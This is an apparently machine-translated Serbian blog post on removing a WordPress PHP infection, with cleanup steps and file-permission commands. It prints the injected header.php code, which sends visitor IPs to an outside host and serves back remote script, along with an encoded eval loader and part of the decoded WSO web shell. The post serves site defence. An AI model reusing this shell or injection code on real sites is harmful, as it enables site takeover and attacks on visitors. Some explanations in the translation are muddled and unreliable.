уклонити WordPress ПХП вирус

Овај водич представља посебан случај када блог WordPress било је заражено. Уклањање WordPress ПХП Вирус.

Пре неки дан сам приметио сумњив код за који се чини да је ПХП вирус WordPress. Следећи ПХП код је био присутан у header.php, пре линије </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Ово је неки ПХП код који изгледа као да покушава да преузме садржај ресурса са спољног сервера, али део који се односи на УРЛ није потпун.

Механизам рада је нешто сложенији и ради ово WordPress ПХП вирус невидљив посетиоцима погођених сајтова. Уместо тога, циља на претраживаче (Гоогле) и имплицитно доводи до значајног смањења броја посетилаца на погођеним веб локацијама.

Цупринс

Детаљи о малверу WordPress ПХП-вирус

1. Горе наведени код је присутан у header.php.

2. На серверу се појавила датотека wp-log.php у фасцикли wp-includes.

3. wp-log.php садржи шифровани код, али који је релативно лако дешифровати.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Дешифрујте код малвера са wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Чини се да је ово злонамерна ПХП скрипта која садржи код за руковање аутентификацијом и радњама на датотекама и директоријумима на серверу. Врло лако се може видети да ова скрипта садржи променљиве попут $auth_pass (лозинка за аутентификацију), $default_action (подразумевана радња), $default_use_ajax (подразумевано коришћењем Ајак-а) и $default_charset (подразумевана поставка карактера).

Очигледно, ова скрипта има одељак који проверава ХТТП корисничке агенте да блокирају приступ одређеним веб ботовима, као што су претраживачи. Такође има одељак који проверава ПХП безбедносни режим и поставља одређене радне директоријуме.

4. Ако се вп-лог.пхп приступа у претраживачу, појављује се веб страница са пољем провера идентитета. На први поглед изгледа да је то менаџер датотека преко којег се нове датотеке могу лако учитати на циљни сервер.

Како девирусирати веб локацију WordPress?

Увек, ручни процес уклањања вируса подразумева прво откривање и разумевање рањивости.

1. Направите резервну копију за целу веб локацију. Ово мора укључивати и датотеке и базу података.

2. Одредите приближно колико дуго је вирус присутан и претражите веб сервер у потрази за измењеним или новокреираним датотекама у оквиру приближног временског оквира.

На пример, ако желите да видите датотеке .php креиран или измењен у последњој недељи, покрените команду на серверу:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

То је једноставан метод помоћу којег можете открити датотеке WordPress заражене и оне које садрже малвер код.

3. Проверите датотеку .htaccess сумњивих директива. Редови дозвола или извршавање скрипте.

4. Проверите базу података. Сасвим је могуће да неки постови и странице WordPress бити уређиван са малвером или додатим новим корисници са улогом administrator.

5. Проверите дозволе за писање за фасцикле и датотеке. chmod си chown.

Препоручене дозволе су: 644 за датотеке и 755 за директоријуме.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Ажурирајте све WordPress Plugins / WordPress Themes.

Релатед: Fix Redirect WordPress Hack 2023 (Вирус за преусмеравање)

Ово су „основне“ методе помоћу којих можете девирусирати веб локацију/блог WordPress. Ако имате проблема и потребна вам је помоћ, одељак за коментаре је отворен.